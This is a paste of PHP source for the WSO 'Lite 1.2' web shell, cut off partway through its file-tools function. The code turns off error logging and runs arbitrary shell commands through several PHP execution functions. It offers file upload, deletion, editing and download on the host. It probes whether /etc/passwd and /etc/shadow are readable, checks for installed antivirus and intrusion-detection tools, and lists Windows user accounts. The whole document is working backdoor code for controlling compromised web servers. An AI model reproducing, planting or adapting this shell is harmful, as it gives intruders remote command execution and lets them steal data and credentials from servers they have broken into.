SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | $color = "#df5"; | |
3 | $default_action = 'FilesMan'; | |
4 | $default_use_ajax = true; | |
5 | $default_charset = 'Windows-1251'; | |
6 | ||
7 | @session_start(); | |
8 | @ini_set('error_log',NULL); | |
9 | @ini_set('log_errors',0); | |
10 | @ini_set('max_execution_time',0); | |
11 | @set_time_limit(0); | |
12 | @set_magic_quotes_runtime(0); | |
13 | @define('WSO_VERSION', 'Lite 1.2'); | |
14 | ||
15 | if(get_magic_quotes_gpc()) { | |
16 | function WSOstripslashes($array) { | |
17 | return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); | |
18 | } | |
19 | $_POST = WSOstripslashes($_POST); | |
20 | } | |
21 | ||
22 | if(strtolower(substr(PHP_OS,0,3)) == "win") | |
23 | $os = 'win'; | |
24 | else | |
25 | $os = 'nix'; | |
26 | ||
27 | $safe_mode = @ini_get('safe_mode'); | |
28 | if(!$safe_mode) | |
29 | error_reporting(0); | |
30 | ||
31 | $disable_functions = @ini_get('disable_functions'); | |
32 | $home_cwd = @getcwd(); | |
33 | if(isset($_POST['c'])) | |
34 | @chdir($_POST['c']); | |
35 | $cwd = @getcwd(); | |
36 | if($os == 'win') { | |
37 | $home_cwd = str_replace("\\", "/", $home_cwd); | |
38 | $cwd = str_replace("\\", "/", $cwd); | |
39 | } | |
40 | if($cwd[strlen($cwd)-1] != '/' ) | |
41 | $cwd .= '/'; | |
42 | ||
43 | if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | |
44 | $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; | |
45 | ||
46 | function wsoHeader() { | |
47 | if(empty($_POST['charset'])) | |
48 | $_POST['charset'] = $GLOBALS['default_charset']; | |
49 | global $color; | |
50 | echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>WSO " . WSO_VERSION ."</title> | |
51 | <style> | |
52 | body{background-color:#444;color:#e1e1e1;} | |
53 | body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;} | |
54 | table.info{color:#fff;background-color:#222;} | |
55 | span,h1,a{color: $color !important;} | |
56 | span{font-weight: bolder;} | |
57 | h1{border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;} | |
58 | div.content{padding: 5px;margin-left:5px;background-color:#333;} | |
59 | a{text-decoration:none;} | |
60 | a:hover{text-decoration:underline;} | |
61 | .ml1{border:1px solid #444;padding:5px;margin:0;overflow: auto;} | |
62 | .bigarea{width:100%;height:300px;} | |
63 | input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New';} | |
64 | form{margin:0px;} | |
65 | #toolsTbl{text-align:center;} | |
66 | .toolsInp{width: 80%;} | |
67 | .main th{text-align:left;background-color:#5e5e5e;} | |
68 | .main tr:hover{background-color:#5e5e5e} | |
69 | .main td, th{vertical-align:middle} | |
70 | .l1{background-color:#444} | |
71 | pre{font-family:Courier,Monospace} | |
72 | </style> | |
73 | <script> | |
74 | var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | |
75 | var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | |
76 | var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | |
77 | var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | |
78 | var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | |
79 | var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | |
80 | var d = document; | |
81 | function set(a,c,p1,p2,p3,charset) { | |
82 | if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | |
83 | if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | |
84 | if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | |
85 | if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | |
86 | if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | |
87 | if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | |
88 | } | |
89 | function g(a,c,p1,p2,p3,charset) { | |
90 | set(a,c,p1,p2,p3,charset); | |
91 | d.mf.submit(); | |
92 | } | |
93 | function a(a,c,p1,p2,p3,charset) { | |
94 | set(a,c,p1,p2,p3,charset); | |
95 | var params = 'ajax=true'; | |
96 | for(i=0;i<d.mf.elements.length;i++) | |
97 | params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | |
98 | sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | |
99 | } | |
100 | function sr(url, params) { | |
101 | if (window.XMLHttpRequest) | |
102 | req = new XMLHttpRequest(); | |
103 | else if (window.ActiveXObject) | |
104 | req = new ActiveXObject('Microsoft.XMLHTTP'); | |
105 | if (req) { | |
106 | req.onreadystatechange = processReqChange; | |
107 | req.open('POST', url, true); | |
108 | req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | |
109 | req.send(params); | |
110 | } | |
111 | } | |
112 | function processReqChange() { | |
113 | if( (req.readyState == 4) ) | |
114 | if(req.status == 200) { | |
115 | var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | |
116 | var arr=reg.exec(req.responseText); | |
117 | eval(arr[2].substr(0, arr[1])); | |
118 | } else alert('Request error!'); | |
119 | } | |
120 | </script> | |
121 | <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> | |
122 | <form method=post name=mf style='display:none;'> | |
123 | <input type=hidden name=a> | |
124 | <input type=hidden name=c> | |
125 | <input type=hidden name=p1> | |
126 | <input type=hidden name=p2> | |
127 | <input type=hidden name=p3> | |
128 | <input type=hidden name=charset> | |
129 | </form>"; | |
130 | $freeSpace = @diskfreespace($GLOBALS['cwd']); | |
131 | $totalSpace = @disk_total_space($GLOBALS['cwd']); | |
132 | $totalSpace = $totalSpace?$totalSpace:1; | |
133 | $release = @php_uname('r'); | |
134 | $kernel = @php_uname('s'); | |
135 | if(!function_exists('posix_getegid')) { | |
136 | $user = @get_current_user(); | |
137 | $uid = @getmyuid(); | |
138 | $gid = @getmygid(); | |
139 | $group = "?"; | |
140 | } else { | |
141 | $uid = @posix_getpwuid(posix_geteuid()); | |
142 | $gid = @posix_getgrgid(posix_getegid()); | |
143 | $user = $uid['name']; | |
144 | $uid = $uid['uid']; | |
145 | $group = $gid['name']; | |
146 | $gid = $gid['gid']; | |
147 | } | |
148 | ||
149 | $cwd_links = ''; | |
150 | $path = explode("/", $GLOBALS['cwd']); | |
151 | $n=count($path); | |
152 | for($i=0; $i<$n-1; $i++) { | |
153 | $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | |
154 | for($j=0; $j<=$i; $j++) | |
155 | $cwd_links .= $path[$j].'/'; | |
156 | $cwd_links .= "\")'>".$path[$i]."/</a>"; | |
157 | } | |
158 | ||
159 | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | |
160 | $opt_charsets = ''; | |
161 | foreach($charsets as $item) | |
162 | $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; | |
163 | ||
164 | $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','Network'=>'Network'); | |
165 | $menu = ''; | |
166 | foreach($m as $k => $v) | |
167 | $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>'; | |
168 | ||
169 | $drives = ""; | |
170 | if($GLOBALS['os'] == 'win') { | |
171 | foreach(range('c','z') as $drive) | |
172 | if(is_dir($drive.':\\')) | |
173 | $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | |
174 | } | |
175 | echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' | |
176 | . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') | |
177 | . '<span> Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' | |
178 | . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' | |
179 | . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; | |
180 | } | |
181 | ||
182 | function wsoFooter() { | |
183 | $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; | |
184 | echo " | |
185 | </div> | |
186 | <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> | |
187 | <tr> | |
188 | <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | |
189 | <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
190 | </tr><tr> | |
191 | <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | |
192 | <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | |
193 | </tr><tr> | |
194 | <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | |
195 | <td><form method='post' ENCTYPE='multipart/form-data'> | |
196 | <input type=hidden name=a value='FilesMAn'> | |
197 | <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> | |
198 | <input type=hidden name=p1 value='uploadFile'> | |
199 | <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | |
200 | <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> | |
201 | ||
202 | </tr></table></div></body></html>"; | |
203 | } | |
204 | ||
205 | if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { | |
206 | function posix_getpwuid($p) {return false;} } | |
207 | if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { | |
208 | function posix_getgrgid($p) {return false;} } | |
209 | ||
210 | function wsoEx($in) { | |
211 | $out = ''; | |
212 | if (function_exists('exec')) { | |
213 | @exec($in,$out); | |
214 | $out = @join("\n",$out); | |
215 | } elseif (function_exists('passthru')) { | |
216 | ob_start(); | |
217 | @passthru($in); | |
218 | $out = ob_get_clean(); | |
219 | } elseif (function_exists('system')) { | |
220 | ob_start(); | |
221 | @system($in); | |
222 | $out = ob_get_clean(); | |
223 | } elseif (function_exists('shell_exec')) { | |
224 | $out = shell_exec($in); | |
225 | } elseif (is_resource($f = @popen($in,"r"))) { | |
226 | $out = ""; | |
227 | while(!@feof($f)) | |
228 | $out .= fread($f,1024); | |
229 | pclose($f); | |
230 | } | |
231 | return $out; | |
232 | } | |
233 | function wsoViewSize($s) { | |
234 | if($s >= 1073741824) | |
235 | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | |
236 | elseif($s >= 1048576) | |
237 | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | |
238 | elseif($s >= 1024) | |
239 | return sprintf('%1.2f', $s / 1024 ) . ' KB'; | |
240 | else | |
241 | return $s . ' B'; | |
242 | } | |
243 | ||
244 | function wsoPerms($p) { | |
245 | if (($p & 0xC000) == 0xC000)$i = 's'; | |
246 | elseif (($p & 0xA000) == 0xA000)$i = 'l'; | |
247 | elseif (($p & 0x8000) == 0x8000)$i = '-'; | |
248 | elseif (($p & 0x6000) == 0x6000)$i = 'b'; | |
249 | elseif (($p & 0x4000) == 0x4000)$i = 'd'; | |
250 | elseif (($p & 0x2000) == 0x2000)$i = 'c'; | |
251 | elseif (($p & 0x1000) == 0x1000)$i = 'p'; | |
252 | else $i = 'u'; | |
253 | $i .= (($p & 0x0100) ? 'r' : '-'); | |
254 | $i .= (($p & 0x0080) ? 'w' : '-'); | |
255 | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | |
256 | $i .= (($p & 0x0020) ? 'r' : '-'); | |
257 | $i .= (($p & 0x0010) ? 'w' : '-'); | |
258 | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | |
259 | $i .= (($p & 0x0004) ? 'r' : '-'); | |
260 | $i .= (($p & 0x0002) ? 'w' : '-'); | |
261 | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | |
262 | return $i; | |
263 | } | |
264 | ||
265 | function wsoPermsColor($f) { | |
266 | if (!@is_readable($f)) | |
267 | return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; | |
268 | elseif (!@is_writable($f)) | |
269 | return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; | |
270 | else | |
271 | return '<font color=green>' . wsoPerms(@fileperms($f)) . '</font>'; | |
272 | } | |
273 | ||
274 | if(!function_exists("scandir")) { | |
275 | function scandir($dir) { | |
276 | $dh = opendir($dir); | |
277 | while (false !== ($filename = readdir($dh))) | |
278 | $files[] = $filename; | |
279 | return $files; | |
280 | } | |
281 | } | |
282 | ||
283 | function wsoWhich($p) { | |
284 | $path = wsoEx('which ' . $p); | |
285 | if(!empty($path)) | |
286 | return $path; | |
287 | return false; | |
288 | } | |
289 | ||
290 | function actionSecInfo() { | |
291 | wsoHeader(); | |
292 | echo '<h1>Server security information</h1><div class=content>'; | |
293 | function wsoSecParam($n, $v) { | |
294 | $v = trim($v); | |
295 | if($v) { | |
296 | echo '<span>' . $n . ': </span>'; | |
297 | if(strpos($v, "\n") === false) | |
298 | echo $v . '<br>'; | |
299 | else | |
300 | echo '<pre class=ml1>' . $v . '</pre>'; | |
301 | } | |
302 | } | |
303 | ||
304 | wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); | |
305 | if(function_exists('apache_get_modules')) | |
306 | wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | |
307 | wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | |
308 | wsoSecParam('Open base dir', @ini_get('open_basedir')); | |
309 | wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | |
310 | wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | |
311 | wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | |
312 | $temp=array(); | |
313 | if(function_exists('mysql_get_client_info')) | |
314 | $temp[] = "MySql (".mysql_get_client_info().")"; | |
315 | if(function_exists('mssql_connect')) | |
316 | $temp[] = "MSSQL"; | |
317 | if(function_exists('pg_connect')) | |
318 | $temp[] = "PostgreSQL"; | |
319 | if(function_exists('oci_connect')) | |
320 | $temp[] = "Oracle"; | |
321 | wsoSecParam('Supported databases', implode(', ', $temp)); | |
322 | echo '<br>'; | |
323 | ||
324 | if($GLOBALS['os'] == 'nix') { | |
325 | wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | |
326 | wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); | |
327 | wsoSecParam('OS version', @file_get_contents('/proc/version')); | |
328 | wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); | |
329 | if(!$GLOBALS['safe_mode']) { | |
330 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | |
331 | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | |
332 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | |
333 | echo '<br>'; | |
334 | $temp=array(); | |
335 | foreach ($userful as $item) | |
336 | if(wsoWhich($item)) | |
337 | $temp[] = $item; | |
338 | wsoSecParam('Userful', implode(', ',$temp)); | |
339 | $temp=array(); | |
340 | foreach ($danger as $item) | |
341 | if(wsoWhich($item)) | |
342 | $temp[] = $item; | |
343 | wsoSecParam('Danger', implode(', ',$temp)); | |
344 | $temp=array(); | |
345 | foreach ($downloaders as $item) | |
346 | if(wsoWhich($item)) | |
347 | $temp[] = $item; | |
348 | wsoSecParam('Downloaders', implode(', ',$temp)); | |
349 | echo '<br/>'; | |
350 | wsoSecParam('HDD space', wsoEx('df -h')); | |
351 | wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); | |
352 | } | |
353 | } else { | |
354 | wsoSecParam('OS Version',wsoEx('ver')); | |
355 | wsoSecParam('Account Settings',wsoEx('net accounts')); | |
356 | wsoSecParam('User Accounts',wsoEx('net user')); | |
357 | } | |
358 | echo '</div>'; | |
359 | wsoFooter(); | |
360 | } | |
361 | ||
362 | function actionFilesMan() { | |
363 | wsoHeader(); | |
364 | echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | |
365 | if(!empty($_POST['p1'])) { | |
366 | switch($_POST['p1']) { | |
367 | case 'uploadFile': | |
368 | if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) | |
369 | echo "Can't upload file!"; | |
370 | break; | |
371 | case 'mkdir': | |
372 | if(!@mkdir($_POST['p2'])) | |
373 | echo "Can't create new dir"; | |
374 | break; | |
375 | case 'delete': | |
376 | function deleteDir($path) { | |
377 | $path = (substr($path,-1)=='/') ? $path:$path.'/'; | |
378 | $dh = opendir($path); | |
379 | while ( ($item = readdir($dh) ) !== false) { | |
380 | $item = $path.$item; | |
381 | if ( (basename($item) == "..") || (basename($item) == ".") ) | |
382 | continue; | |
383 | $type = filetype($item); | |
384 | if ($type == "dir") | |
385 | deleteDir($item); | |
386 | else | |
387 | @unlink($item); | |
388 | } | |
389 | closedir($dh); | |
390 | @rmdir($path); | |
391 | } | |
392 | if(is_array(@$_POST['f'])) | |
393 | foreach($_POST['f'] as $f) { | |
394 | if($f == '..') | |
395 | continue; | |
396 | $f = urldecode($f); | |
397 | if(is_dir($f)) | |
398 | deleteDir($f); | |
399 | else | |
400 | @unlink($f); | |
401 | } | |
402 | break; | |
403 | case 'paste': | |
404 | if($_SESSION['act'] == 'copy') { | |
405 | function copy_paste($c,$s,$d){ | |
406 | if(is_dir($c.$s)){ | |
407 | mkdir($d.$s); | |
408 | $h = @opendir($c.$s); | |
409 | while (($f = @readdir($h)) !== false) | |
410 | if (($f != ".") and ($f != "..")) | |
411 | copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
412 | } elseif(is_file($c.$s)) | |
413 | @copy($c.$s, $d.$s); | |
414 | } | |
415 | foreach($_SESSION['f'] as $f) | |
416 | copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); | |
417 | } elseif($_SESSION['act'] == 'move') { | |
418 | function move_paste($c,$s,$d){ | |
419 | if(is_dir($c.$s)){ | |
420 | mkdir($d.$s); | |
421 | $h = @opendir($c.$s); | |
422 | while (($f = @readdir($h)) !== false) | |
423 | if (($f != ".") and ($f != "..")) | |
424 | copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
425 | } elseif(@is_file($c.$s)) | |
426 | @copy($c.$s, $d.$s); | |
427 | } | |
428 | foreach($_SESSION['f'] as $f) | |
429 | @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); | |
430 | } elseif($_SESSION['act'] == 'zip') { | |
431 | if(class_exists('ZipArchive')) { | |
432 | $zip = new ZipArchive(); | |
433 | if ($zip->open($_POST['p2'], 1)) { | |
434 | chdir($_SESSION['c']); | |
435 | foreach($_SESSION['f'] as $f) { | |
436 | if($f == '..') | |
437 | continue; | |
438 | if(@is_file($_SESSION['c'].$f)) | |
439 | $zip->addFile($_SESSION['c'].$f, $f); | |
440 | elseif(@is_dir($_SESSION['c'].$f)) { | |
441 | $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); | |
442 | foreach ($iterator as $key=>$value) { | |
443 | $zip->addFile(realpath($key), $key); | |
444 | } | |
445 | } | |
446 | } | |
447 | chdir($GLOBALS['cwd']); | |
448 | $zip->close(); | |
449 | } | |
450 | } | |
451 | } elseif($_SESSION['act'] == 'unzip') { | |
452 | if(class_exists('ZipArchive')) { | |
453 | $zip = new ZipArchive(); | |
454 | foreach($_SESSION['f'] as $f) { | |
455 | if($zip->open($_SESSION['c'].$f)) { | |
456 | $zip->extractTo($GLOBALS['cwd']); | |
457 | $zip->close(); | |
458 | } | |
459 | } | |
460 | } | |
461 | } elseif($_SESSION['act'] == 'tar') { | |
462 | chdir($_SESSION['c']); | |
463 | $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']); | |
464 | wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f'])); | |
465 | chdir($GLOBALS['cwd']); | |
466 | } | |
467 | unset($_SESSION['f']); | |
468 | break; | |
469 | default: | |
470 | if(!empty($_POST['p1'])) { | |
471 | $_SESSION['act'] = @$_POST['p1']; | |
472 | $_SESSION['f'] = @$_POST['f']; | |
473 | foreach($_SESSION['f'] as $k => $f) | |
474 | $_SESSION['f'][$k] = urldecode($f); | |
475 | $_SESSION['c'] = @$_POST['c']; | |
476 | } | |
477 | break; | |
478 | } | |
479 | } | |
480 | $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | |
481 | if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } | |
482 | global $sort; | |
483 | $sort = array('name', 1); | |
484 | if(!empty($_POST['p1'])) { | |
485 | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | |
486 | $sort = array($match[1], (int)$match[2]); | |
487 | } | |
488 | echo "<script> | |
489 | function sa() { | |
490 | for(i=0;i<d.files.elements.length;i++) | |
491 | if(d.files.elements[i].type == 'checkbox') | |
492 | d.files.elements[i].checked = d.files.elements[0].checked; | |
493 | } | |
494 | ||
495 | </script> | |
496 | <table width='100%' class='main' cellspacing='0' cellpadding='2'> | |
497 | <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | |
498 | $dirs = $files = array(); | |
499 | $n = count($dirContent); | |
500 | for($i=0;$i<$n;$i++) { | |
501 | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | |
502 | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | |
503 | $tmp = array('name' => $dirContent[$i], | |
504 | 'path' => $GLOBALS['cwd'].$dirContent[$i], | |
505 | 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | |
506 | 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | |
507 | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | |
508 | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | |
509 | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | |
510 | ); | |
511 | if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | |
512 | $files[] = array_merge($tmp, array('type' => 'file')); | |
513 | elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | |
514 | $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | |
515 | elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) | |
516 | $dirs[] = array_merge($tmp, array('type' => 'dir')); | |
517 | } | |
518 | $GLOBALS['sort'] = $sort; | |
519 | function wsoCmp($a, $b) { | |
520 | if($GLOBALS['sort'][0] != 'size') | |
521 | return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | |
522 | else | |
523 | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | |
524 | } | |
525 | usort($files, "wsoCmp"); | |
526 | usort($dirs, "wsoCmp"); | |
527 | $files = array_merge($dirs, $files); | |
528 | $l = 0; | |
529 | foreach($files as $f) { | |
530 | echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | |
531 | .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | |
532 | $l = $l?0:1; | |
533 | } | |
534 | echo "<tr><td colspan=7> | |
535 | ||
536 | <input type=hidden name=a value='FilesMan'> | |
537 | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | |
538 | <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | |
539 | <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | |
540 | if(class_exists('ZipArchive')) | |
541 | echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; | |
542 | echo "<option value='tar'>Compress (tar.gz)</option>"; | |
543 | if(!empty($_SESSION['act']) && @count($_SESSION['f'])) | |
544 | echo "<option value='paste'>Paste / Compress</option>"; | |
545 | echo "</select> "; | |
546 | if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar'))) | |
547 | echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> "; | |
548 | echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | |
549 | wsoFooter(); | |
550 | } | |
551 | ||
552 | function actionFilesTools() { | |
553 | if( isset($_POST['p1']) ) | |
554 | $_POST['p1'] = urldecode($_POST['p1']); | |
555 | if(@$_POST['p2']=='download') { | |
556 | if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | |
557 | ob_start("ob_gzhandler", 4096); | |
558 | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | |
559 | if (function_exists("mime_content_type")) { | |
560 | $type = @mime_content_type($_POST['p1']); | |
561 | header("Content-Type: " . $type); | |
562 | } else | |
563 | header("Content-Type: application/octet-stream"); | |
564 | $fp = @fopen($_POST['p1'], "r"); | |
565 | if($fp) { | |
566 | while(!@feof($fp)) | |
567 | echo @fread($fp, 1024); | |
568 | fclose($fp); | |
569 | } | |
570 | }exit; | |
571 | } | |
572 | if( @$_POST['p2'] == 'mkfile' ) { | |
